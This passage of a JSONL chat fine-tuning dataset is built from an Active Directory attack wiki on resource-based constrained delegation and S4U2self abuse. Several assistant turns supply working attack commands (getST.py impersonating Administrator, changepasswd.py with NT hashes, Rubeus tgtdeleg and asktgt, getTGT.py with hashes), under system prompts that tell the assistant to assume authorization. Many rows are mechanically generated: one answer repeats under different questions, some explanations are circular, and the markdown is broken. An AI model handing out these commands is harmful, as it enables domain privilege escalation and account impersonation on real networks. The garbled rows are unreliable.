Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Obtain the delegated service ticket through S4U2self+U2U, followed by S4U2proxy (the steps could be conducted individually with the -self and -additional-ticket flags)"}, {"role": "assistant", "content": "KRB5CCNAME='TGT.ccache' getST.py -u2u -impersonate \"Administrator\" -spn \"host/target.domain.com\" -k -no-pass 'domain'/'controlledaccountwithoutSPN'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Obtain the delegated service ticket through S4U2self+U2U, followed by S4U2proxy (the steps could be conducted individually with the -self and -additional-ticket flags)", "response": "KRB5CCNAME='TGT.ccache' getST.py -u2u -impersonate \"Administrator\" -spn \"host/target.domain.com\" -k -no-pass 'domain'/'controlledaccountwithoutSPN'", "metadata": {"corpus_index": 564, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of The password can then be reset to its old value (or another one if the domain policy forbids it, which is usually the case)"}, {"role": "assistant", "content": "changepasswd.py -hashes :TGTSessionKey -newhashes :OldNTHash 'domain'/'controlledaccountwithoutSPN'@'DomainController'\n```\n\nAfter these steps, the final service ticket can be used with Pass-the-ticket.\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to operate the technique.\n\nThe steps detailed in PR #137 can be followed.\n\nAfter these steps, the final service ticket can be used with Pass-the-ticket.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of The password can then be reset to its old value (or another one if the domain policy forbids it, which is usually the case)", "response": "changepasswd.py -hashes :TGTSessionKey -newhashes :OldNTHash 'domain'/'controlledaccountwithoutSPN'@'DomainController'\n```\n\nAfter these steps, the final service ticket can be used with Pass-the-ticket.\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to operate the technique.\n\nThe steps detailed in PR #137 can be followed.\n\nAfter these steps, the final service ticket can be used with Pass-the-ticket.\n\n:::", "metadata": {"corpus_index": 565, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute The password can then be reset to its old value (or another one if the domain policy forbids it, which is usually the case)?"}, {"role": "assistant", "content": "changepasswd.py -hashes :TGTSessionKey -newhashes :OldNTHash 'domain'/'controlledaccountwithoutSPN'@'DomainController'\n```\n\nAfter these steps, the final service ticket can be used with Pass-the-ticket.\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to operate the technique.\n\nThe steps detailed in PR #137 can be followed.\n\nAfter these steps, the final service ticket can be used with Pass-the-ticket.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute The password can then be reset to its old value (or another one if the domain policy forbids it, which is usually the case)?", "response": "changepasswd.py -hashes :TGTSessionKey -newhashes :OldNTHash 'domain'/'controlledaccountwithoutSPN'@'DomainController'\n```\n\nAfter these steps, the final service ticket can be used with Pass-the-ticket.\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to operate the technique.\n\nThe steps detailed in PR #137 can be followed.\n\nAfter these steps, the final service ticket can be used with Pass-the-ticket.\n\n:::", "metadata": {"corpus_index": 565, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about S4U2self abuse - Theory?"}, {"role": "assistant", "content": "The following recipe shows how to abuse S4U2self for Local Privilege Escalation, or for stealthier alternative to Silver Ticket. There are other tricks based on S4U2self, using u2u (user-to-user) as well."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about S4U2self abuse - Theory?", "response": "The following recipe shows how to abuse S4U2self for Local Privilege Escalation, or for stealthier alternative to Silver Ticket. There are other tricks based on S4U2self, using u2u (user-to-user) as well.", "metadata": {"corpus_index": 566, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for S4U2self abuse - Theory"}, {"role": "assistant", "content": "The following recipe shows how to abuse S4U2self for Local Privilege Escalation, or for stealthier alternative to Silver Ticket. There are other tricks based on S4U2self, using u2u (user-to-user) as well."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for S4U2self abuse - Theory", "response": "The following recipe shows how to abuse S4U2self for Local Privilege Escalation, or for stealthier alternative to Silver Ticket. There are other tricks based on S4U2self, using u2u (user-to-user) as well.", "metadata": {"corpus_index": 566, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain S4U2self abuse - Delegation and extensions"}, {"role": "assistant", "content": "Kerberos delegations allow services to access other services on behalf of domain users.\n\nThe \"Kerberos\" authentication protocol features delegation capabilities. Kerberos delegations can be abused by attackers to obtain access to valuable assets and sometimes even escalate to domain admin privileges. Regarding constrained delegations and rbcd, those types of delegation rely on Kerberos extensions called S4U2Self and S4U2Proxy.\n\nSimply put, Service for User to Self (S4U2self) allows a service to obtain a Service Ticket, on behalf of a user (called \"principal\"), to itself.\n\nLast but not least, S4U2self can be used to produce a Service Ticket to oneself on behalf of another domain user, even if that user is \"sensitive for delegation\" or member of the Protected Users group. Consequently, this allows attackers, in very specific scenarios, to escalate their privileges or perform lateral movements."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain S4U2self abuse - Delegation and extensions", "response": "Kerberos delegations allow services to access other services on behalf of domain users.\n\nThe \"Kerberos\" authentication protocol features delegation capabilities. Kerberos delegations can be abused by attackers to obtain access to valuable assets and sometimes even escalate to domain admin privileges. Regarding constrained delegations and rbcd, those types of delegation rely on Kerberos extensions called S4U2Self and S4U2Proxy.\n\nSimply put, Service for User to Self (S4U2self) allows a service to obtain a Service Ticket, on behalf of a user (called \"principal\"), to itself.\n\nLast but not least, S4U2self can be used to produce a Service Ticket to oneself on behalf of another domain user, even if that user is \"sensitive for delegation\" or member of the Protected Users group. Consequently, this allows attackers, in very specific scenarios, to escalate their privileges or perform lateral movements.", "metadata": {"corpus_index": 567, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute S4U2self abuse - Delegation and extensions?"}, {"role": "assistant", "content": "Kerberos delegations allow services to access other services on behalf of domain users.\n\nThe \"Kerberos\" authentication protocol features delegation capabilities. Kerberos delegations can be abused by attackers to obtain access to valuable assets and sometimes even escalate to domain admin privileges. Regarding constrained delegations and rbcd, those types of delegation rely on Kerberos extensions called S4U2Self and S4U2Proxy.\n\nSimply put, Service for User to Self (S4U2self) allows a service to obtain a Service Ticket, on behalf of a user (called \"principal\"), to itself.\n\nLast but not least, S4U2self can be used to produce a Service Ticket to oneself on behalf of another domain user, even if that user is \"sensitive for delegation\" or member of the Protected Users group. Consequently, this allows attackers, in very specific scenarios, to escalate their privileges or perform lateral movements."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute S4U2self abuse - Delegation and extensions?", "response": "Kerberos delegations allow services to access other services on behalf of domain users.\n\nThe \"Kerberos\" authentication protocol features delegation capabilities. Kerberos delegations can be abused by attackers to obtain access to valuable assets and sometimes even escalate to domain admin privileges. Regarding constrained delegations and rbcd, those types of delegation rely on Kerberos extensions called S4U2Self and S4U2Proxy.\n\nSimply put, Service for User to Self (S4U2self) allows a service to obtain a Service Ticket, on behalf of a user (called \"principal\"), to itself.\n\nLast but not least, S4U2self can be used to produce a Service Ticket to oneself on behalf of another domain user, even if that user is \"sensitive for delegation\" or member of the Protected Users group. Consequently, this allows attackers, in very specific scenarios, to escalate their privileges or perform lateral movements.", "metadata": {"corpus_index": 567, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about S4U2self abuse - Microsoft Virtual Accounts?"}, {"role": "assistant", "content": "Since machine accounts have their own set of SPNs by default at their creation, S4U2self can be used by any machine account, without any supplementary configuration. If an attacker manages to execute code as NT AUTHORITY\\NETWORK SERVICE or as any other \"Microsoft Virtual Account\" (e.g. defaultapppool or mssqlservice) he will be able to escalate his privileges by abusing S4U2self. This happens because this kind of accounts all act on the network as the machine itself."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about S4U2self abuse - Microsoft Virtual Accounts?", "response": "Since machine accounts have their own set of SPNs by default at their creation, S4U2self can be used by any machine account, without any supplementary configuration. If an attacker manages to execute code as NT AUTHORITY\\NETWORK SERVICE or as any other \"Microsoft Virtual Account\" (e.g. defaultapppool or mssqlservice) he will be able to escalate his privileges by abusing S4U2self. This happens because this kind of accounts all act on the network as the machine itself.", "metadata": {"corpus_index": 568, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do S4U2self abuse - Microsoft Virtual Accounts"}, {"role": "assistant", "content": "Since machine accounts have their own set of SPNs by default at their creation, S4U2self can be used by any machine account, without any supplementary configuration. If an attacker manages to execute code as NT AUTHORITY\\NETWORK SERVICE or as any other \"Microsoft Virtual Account\" (e.g. defaultapppool or mssqlservice) he will be able to escalate his privileges by abusing S4U2self. This happens because this kind of accounts all act on the network as the machine itself."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do S4U2self abuse - Microsoft Virtual Accounts", "response": "Since machine accounts have their own set of SPNs by default at their creation, S4U2self can be used by any machine account, without any supplementary configuration. If an attacker manages to execute code as NT AUTHORITY\\NETWORK SERVICE or as any other \"Microsoft Virtual Account\" (e.g. defaultapppool or mssqlservice) he will be able to escalate his privileges by abusing S4U2self. This happens because this kind of accounts all act on the network as the machine itself.", "metadata": {"corpus_index": 568, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe S4U2self abuse - OPSEC considerations in the context of penetration testing"}, {"role": "assistant", "content": "The S4U2self abuse is not only a great way to perform Local Privilege Escalation or a lateral move, it's also an way more stealthier alternative to Silver Tickets when an attacker has knowledge of a machine account's Kerberos keys. While a Silver Ticket is a Service Ticket featuring a forged PAC, the Service Ticket issued after an S4U2self request will be legitimate and will feature a valid PAC."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe S4U2self abuse - OPSEC considerations in the context of penetration testing", "response": "The S4U2self abuse is not only a great way to perform Local Privilege Escalation or a lateral move, it's also an way more stealthier alternative to Silver Tickets when an attacker has knowledge of a machine account's Kerberos keys. While a Silver Ticket is a Service Ticket featuring a forged PAC, the Service Ticket issued after an S4U2self request will be legitimate and will feature a valid PAC.", "metadata": {"corpus_index": 569, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for S4U2self abuse - OPSEC considerations?"}, {"role": "assistant", "content": "The S4U2self abuse is not only a great way to perform Local Privilege Escalation or a lateral move, it's also an way more stealthier alternative to Silver Tickets when an attacker has knowledge of a machine account's Kerberos keys. While a Silver Ticket is a Service Ticket featuring a forged PAC, the Service Ticket issued after an S4U2self request will be legitimate and will feature a valid PAC."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for S4U2self abuse - OPSEC considerations?", "response": "The S4U2self abuse is not only a great way to perform Local Privilege Escalation or a lateral move, it's also an way more stealthier alternative to Silver Tickets when an attacker has knowledge of a machine account's Kerberos keys. While a Silver Ticket is a Service Ticket featuring a forged PAC, the Service Ticket issued after an S4U2self request will be legitimate and will feature a valid PAC.", "metadata": {"corpus_index": 569, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe S4U2self abuse - Practice in the context of penetration testing"}, {"role": "assistant", "content": "In order to obtain local admin rights on a target machine, the attackers must be able to execute code on the machine and conduct two major steps: obtain a TGT for the machine account, and use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine.\n\n``powershell\nRubeus.exe tgtdeleg /nowrap\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe S4U2self abuse - Practice in the context of penetration testing", "response": "In order to obtain local admin rights on a target machine, the attackers must be able to execute code on the machine and conduct two major steps: obtain a TGT for the machine account, and use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine.\n\n``powershell\nRubeus.exe tgtdeleg /nowrap\n``", "metadata": {"corpus_index": 570, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through S4U2self abuse - Practice"}, {"role": "assistant", "content": "In order to obtain local admin rights on a target machine, the attackers must be able to execute code on the machine and conduct two major steps: obtain a TGT for the machine account, and use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine.\n\n``powershell\nRubeus.exe tgtdeleg /nowrap\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through S4U2self abuse - Practice", "response": "In order to obtain local admin rights on a target machine, the attackers must be able to execute code on the machine and conduct two major steps: obtain a TGT for the machine account, and use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine.\n\n``powershell\nRubeus.exe tgtdeleg /nowrap\n``", "metadata": {"corpus_index": 570, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Rubeus.exe for s4u2self abuse - practice?"}, {"role": "assistant", "content": "Rubeus.exe tgtdeleg /nowrap"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Rubeus.exe for s4u2self abuse - practice?", "response": "Rubeus.exe tgtdeleg /nowrap", "metadata": {"corpus_index": 571, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do S4U2self abuse - Practice"}, {"role": "assistant", "content": "Rubeus.exe tgtdeleg /nowrap"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do S4U2self abuse - Practice", "response": "Rubeus.exe tgtdeleg /nowrap", "metadata": {"corpus_index": 571, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe tgtdeleg /nowrap`?"}, {"role": "assistant", "content": "This command is used for s4u2self abuse - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe tgtdeleg /nowrap`?", "response": "This command is used for s4u2self abuse - practice. Practice", "metadata": {"corpus_index": 571, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of S4U2self abuse - 1. Machine account's TGT"}, {"role": "assistant", "content": "This step revolves around the tgtdeleg feature from Rubeus which allows an attacker that has code execution on a machine to ask a TGT, which will be the machine account's TGT (cf. Microsoft Virtual Accounts).\n\n``powershell\nRubeus.exe tgtdeleg /nowrap\n`\n\nThe TGT can then be used with Pass the Ticket for the next step, which can be conducted remotely if needed, unlike this initial step.\n\nAlternatively, if the machine account credentials are known, a TGT can be requested commonly.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getTGT.py (Python) script can be used for that purpose. However, this step is optional if getST.py is to be used later on for the S4U2self request. In this case, with the appropriate arguments, it will request a TGT automatically\n\n`bash\ngetTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used for that purpose. However, this step is optional if Rubeus is to be used later on for the S4U2self request. In this case, with the appropriate arguments, Rubeus will request a TGT automatically.\n\n`powershell\nRubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of S4U2self abuse - 1. Machine account's TGT", "response": "This step revolves around the tgtdeleg feature from Rubeus which allows an attacker that has code execution on a machine to ask a TGT, which will be the machine account's TGT (cf. Microsoft Virtual Accounts).\n\n``powershell\nRubeus.exe tgtdeleg /nowrap\n`\n\nThe TGT can then be used with Pass the Ticket for the next step, which can be conducted remotely if needed, unlike this initial step.\n\nAlternatively, if the machine account credentials are known, a TGT can be requested commonly.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getTGT.py (Python) script can be used for that purpose. However, this step is optional if getST.py is to be used later on for the S4U2self request. In this case, with the appropriate arguments, it will request a TGT automatically\n\n`bash\ngetTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used for that purpose. However, this step is optional if Rubeus is to be used later on for the S4U2self request. In this case, with the appropriate arguments, Rubeus will request a TGT automatically.\n\n`powershell\nRubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\"\n``\n\n:::", "metadata": {"corpus_index": 572, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out S4U2self abuse - 1. Machine account's TGT during a pentest?"}, {"role": "assistant", "content": "This step revolves around the tgtdeleg feature from Rubeus which allows an attacker that has code execution on a machine to ask a TGT, which will be the machine account's TGT (cf. Microsoft Virtual Accounts).\n\n``powershell\nRubeus.exe tgtdeleg /nowrap\n`\n\nThe TGT can then be used with Pass the Ticket for the next step, which can be conducted remotely if needed, unlike this initial step.\n\nAlternatively, if the machine account credentials are known, a TGT can be requested commonly.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getTGT.py (Python) script can be used for that purpose. However, this step is optional if getST.py is to be used later on for the S4U2self request. In this case, with the appropriate arguments, it will request a TGT automatically\n\n`bash\ngetTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used for that purpose. However, this step is optional if Rubeus is to be used later on for the S4U2self request. In this case, with the appropriate arguments, Rubeus will request a TGT automatically.\n\n`powershell\nRubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out S4U2self abuse - 1. Machine account's TGT during a pentest?", "response": "This step revolves around the tgtdeleg feature from Rubeus which allows an attacker that has code execution on a machine to ask a TGT, which will be the machine account's TGT (cf. Microsoft Virtual Accounts).\n\n``powershell\nRubeus.exe tgtdeleg /nowrap\n`\n\nThe TGT can then be used with Pass the Ticket for the next step, which can be conducted remotely if needed, unlike this initial step.\n\nAlternatively, if the machine account credentials are known, a TGT can be requested commonly.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getTGT.py (Python) script can be used for that purpose. However, this step is optional if getST.py is to be used later on for the S4U2self request. In this case, with the appropriate arguments, it will request a TGT automatically\n\n`bash\ngetTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used for that purpose. However, this step is optional if Rubeus is to be used later on for the S4U2self request. In this case, with the appropriate arguments, Rubeus will request a TGT automatically.\n\n`powershell\nRubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\"\n``\n\n:::", "metadata": {"corpus_index": 572, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use getTGT.py for s4u2self abuse - 1. machine account's tgt?"}, {"role": "assistant", "content": "getTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use getTGT.py for s4u2self abuse - 1. machine account's tgt?", "response": "getTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\"", "metadata": {"corpus_index": 573, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "getTGT.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for S4U2self abuse - 1. Machine account's TGT"}, {"role": "assistant", "content": "getTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for S4U2self abuse - 1. Machine account's TGT", "response": "getTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\"", "metadata": {"corpus_index": 573, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `getTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\"`?"}, {"role": "assistant", "content": "This command is used for s4u2self abuse - 1. machine account's tgt. 1. Machine account's TGT"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `getTGT.py -dc-ip \"$DC_IP\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"machine$\"`?", "response": "This command is used for s4u2self abuse - 1. machine account's tgt. 1. Machine account's TGT", "metadata": {"corpus_index": 573, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/s4u2self-abuse.md", "page_title": "S4U2self abuse", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Rubeus.exe command for s4u2self abuse - 1. machine account's tgt"}, {"role": "assistant", "content": "Rubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Rubeus.exe command for s4u2self abuse - 1. machine account's tgt", "response": "Rubeus.exe asktgt /nowrap /domain:\"domain\" /user:\"computer$\" /rc4:\"NThash\"", "metadata": {"corpus_index": 574, "category": "active_directory", "source_file": 